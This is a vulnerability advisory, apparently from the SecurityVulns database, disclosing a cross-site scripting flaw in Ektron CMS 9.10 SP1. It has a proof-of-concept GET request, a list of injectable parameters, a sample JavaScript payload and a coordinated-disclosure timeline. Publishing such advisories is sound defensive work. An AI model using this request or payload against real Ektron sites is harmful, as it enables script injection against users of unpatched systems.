Ektron CMS 9.10 SP1 - XSS Vulnerability

2015-06-08T00:00:00
ID SECURITYVULNS:DOC:32182
Type securityvulns
Reporter Securityvulns
Modified 2015-06-08T00:00:00

Description

Vulnerability type: Cross-site Scripting

Vendor: http://www.ektron.com/

Product: Ektron Content Management System

Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102)

Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)

Credit: Jerold Hoong

PROOF OF CONCEPT (XSS)

Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1 on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject arbitrary javascript via the page, action, folder_id and LangType parameters.

GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert %28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0 &LangType=1033 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate .. [SNIP] ... Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0; ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5; .. [SNIP] ...

VULNERABLE PARAMETERS:

  • page
  • action
  • folder_id
  • LangType

SAMPLE PAYLOAD

  • ';alert("XSS")//

TIMELINE

– 07/04/2015: Vulnerability found – 07/04/2015: Vendor informed – 08/04/2015: Vendor responded and acknowledged – 28/05/2015: Vendor fixed the issue – 31/05/2015: Public disclosure